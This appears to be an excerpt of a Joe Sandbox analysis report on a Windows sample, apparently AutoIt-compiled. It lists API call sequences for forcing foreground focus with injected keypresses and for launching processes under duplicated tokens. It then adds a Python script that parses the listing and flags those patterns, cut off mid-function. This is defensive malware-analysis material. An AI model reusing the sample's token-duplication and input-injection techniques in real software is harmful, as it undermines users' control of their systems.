                                                                                              • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                              • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                              • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                              • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
APIs
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
• Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
• Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
• Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
APIs
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
• Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
• Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
• Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
• Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
• Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
• Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
APIs
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: __lock_file
• String ID:
• API String ID: 3031932315-0
• Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
• Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
• Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
• Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
• Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
• Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
• Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
APIs
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
• Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
• Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
APIs
• CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
• Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
• Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
• Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
APIs
• Sleep.KERNELBASE(000001F4), ref: 04738091
Memory Dump Source
• Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4735000_x.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
• Instruction ID: 3f3bdc1c8c4ae54146c00217ef80f19ed37f40ad1c838fd14fa7bfc8f25ee2d1
• Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
• Instruction Fuzzy Hash: 04E0BF7494010DEFDB10EFA8D9496DE7BB4EF04302F1005A1FD05D7681DB309E548A72
APIs
• Sleep.KERNELBASE(000001F4), ref: 04738091
Memory Dump Source
• Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4735000_x.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: d5f547f0214a6d6c0b51910a5cb5e82406d0de85bc19baf663d0646d5c5b348b
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: 42E0E67494010DDFDB00EFB8D94969E7FF4EF04302F100561FD01D2281D6309D508A72
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                              • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                              • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                              • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                              • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                              • SendMessageW.USER32 ref: 0047CA7F
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                              • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                              • ImageList_SetDragCursorImage.COMCTL32(009714F8,00000000,00000000,00000000), ref: 0047CB9B
                                                                                              • ImageList_BeginDrag.COMCTL32(009714F8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                              • SetCapture.USER32(?), ref: 0047CBB6
                                                                                              • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                              • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                              • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                              • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                              • SendMessageW.USER32 ref: 0047CD12
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                              • SendMessageW.USER32 ref: 0047CD80
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                              • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                              • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                              • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                              • SendMessageW.USER32 ref: 0047CE93
                                                                                              • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,02E91B00,00000000,?,?,?,?), ref: 0047CF1C
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                              • SendMessageW.USER32 ref: 0047CF6B
                                                                                              • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,02E91B00,00000000,?,?,?,?), ref: 0047CFE6
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                              • String ID: @GUI_DRAGID$F
                                                                                              • API String ID: 3100379633-4164748364
                                                                                              • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                              • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                              • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                              • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 00434420
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                              • IsIconic.USER32(?), ref: 0043444F
                                                                                              • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                              • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                              • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 2889586943-2988720461
                                                                                              • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                              • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                              • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                              • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                              APIs
                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                              • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                              • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                              • _wcslen.LIBCMT ref: 00446498
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • _wcsncpy.LIBCMT ref: 004464C0
                                                                                              • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                              • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                              • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                              • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                              • CloseDesktop.USER32(?), ref: 0044657A
                                                                                              • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                              • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                              • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                              • String ID: $@OH$default$winsta0
                                                                                              • API String ID: 3324942560-3791954436
                                                                                              • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                              • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                              • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                              • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
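The two function listings above, the foreground-window routine built on AttachThreadInput and keybd_event (the 0x12 passed to MapVirtualKeyW and keybd_event is VK_MENU, the Alt key) and the DuplicateTokenEx / CreateProcessAsUserW routine that opens winsta0 and the default desktop, are the kind of API sequence an analyst wants to pull out of a report like this automatically rather than by scrolling. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses function blocks in the layout used on this page into call records, names the virtual-key constants passed to key-related calls, and flags blocks whose API set matches a small hand-written pattern list. The pattern labels, the VK table and the embedded sample blocks are assumptions constructed for the example; the sample reuses API lines from this page but abridges both blocks and borrows its Strings entry from another block. "Part of subcall function" lines are attributed to the callee and are excluded from pattern matching by default, since counting them would credit a function with calls it does not make itself.

```python
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed sample in the layout of this report's function listing: API lines
# are copied from the page, both blocks are abridged, the Strings entry is borrowed.
SAMPLE = """\
APIs
• GetForegroundWindow.USER32 ref: 00434420
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
• SetForegroundWindow.USER32(?), ref: 0043446A
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
• keybd_event.USER32(00000012,00000000), ref: 004344CF
Strings
Similarity
• String ID: Shell_TrayWnd
• Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
APIs
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
Strings
• Error opening the file, xrefs: 00428231
Similarity
• String ID: $@OH$default$winsta0
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.MODULE(args), ref: ADDR": args and the comma are optional; subcall lines carry a prefix.
API_LINE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<name>[\w:@$]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STRING_LINE = re.compile(r"^•\s*(?P<text>.*?),\s*xrefs:\s*[0-9A-Fa-f]+$")
FIELD_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
# Virtual-key codes that appear as the first argument of key-related calls in this listing.
VK_NAMES = {0x09: "VK_TAB", 0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}
KEY_APIS = {"keybd_event", "GetKeyState", "MapVirtualKeyW"}
# Hand-written pattern list: an assumption for this example, not a Joe Sandbox signature.
PATTERNS = {
    "foreground window forced via AttachThreadInput + synthetic Alt keypress":
        {"AttachThreadInput", "keybd_event", "SetForegroundWindow"},
    "process started under a duplicated token on winsta0\\default":
        {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW", "CreateProcessAsUserW"},
}
# from_subcall marks "Part of subcall function" lines, which belong to a callee, not this function.
ApiCall = namedtuple("ApiCall", "name module args ref from_subcall")


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # "String ID", "Opcode ID", ...

    def api_names(self, include_subcalls=False):
        return {c.name for c in self.calls if include_subcalls or not c.from_subcall}


def parse_blocks(text):
    """Split the listing at each 'APIs' header and parse the sections that follow it."""
    blocks, section, cur = [], None, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
        if line in SECTION_HEADERS:
            section = line
        elif cur is None:
            continue
        elif section == "APIs":
            if (m := API_LINE.match(line)):
                args = tuple(a for a in (m["args"] or "").split(",") if a)
                cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"] is not None))
        elif section == "Strings":
            if (m := STRING_LINE.match(line)):
                cur.strings.append(m["text"])
        elif (m := FIELD_LINE.match(line)):
            cur.fields[m["key"]] = m["val"]
    return blocks


def annotate_keys(block):
    """Name the virtual-key code passed to keybd_event / GetKeyState / MapVirtualKeyW."""
    out = []
    for c in block.calls:
        if c.name in KEY_APIS and c.args and re.fullmatch(r"[0-9A-Fa-f]+", c.args[0]):
            vk = int(c.args[0], 16)
            out.append((c.name, VK_NAMES.get(vk, f"VK_0x{vk:02X}")))
    return out


def match_patterns(block):
    names = block.api_names()
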